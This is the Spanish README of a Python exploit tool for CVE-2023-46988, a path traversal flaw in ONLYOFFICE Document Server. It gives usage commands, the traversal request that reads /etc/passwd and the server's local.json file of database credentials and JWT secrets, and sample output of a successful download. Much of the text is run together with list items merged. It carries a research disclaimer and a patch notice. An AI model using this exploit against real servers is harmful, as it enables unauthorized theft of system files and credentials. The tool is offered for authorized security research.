
CVE-2023-46988: Explotación de Path Traversal en ONLYOFFICE
Este script explota una vulnerabilidad de path traversal en ONLYOFFICE Document Server (CVE-2023-46988) que permite a usuarios no autorizados copiar archivos arbitrarios del servidor. La vulnerabilidad existe en el endpoint /example/editor, donde el parámetro fileExt puede manipularse para acceder a archivos sensibles del sistema y de configuración.
Esta herramienta es solo para fines educativos y de investigación de seguridad autorizada.
El uso no autorizado contra sistemas sin permiso explícito es ilegal y poco ético.
/etc/passwd/etc/onlyoffice/documentserver/local.json (contiene credenciales de base de datos y secretos JWT)--file.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Esto recupera:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor con un parámetro fileExt malicioso:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<extracted_filename>.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE ha parcheado esta vulnerabilidad en su actualización de febrero de 2024.
Los usuarios deben actualizar a la última versión para proteger sus servidores.
Este proyecto está licenciado bajo la Licencia MIT – consulta el archivo LICENSE para más detalles.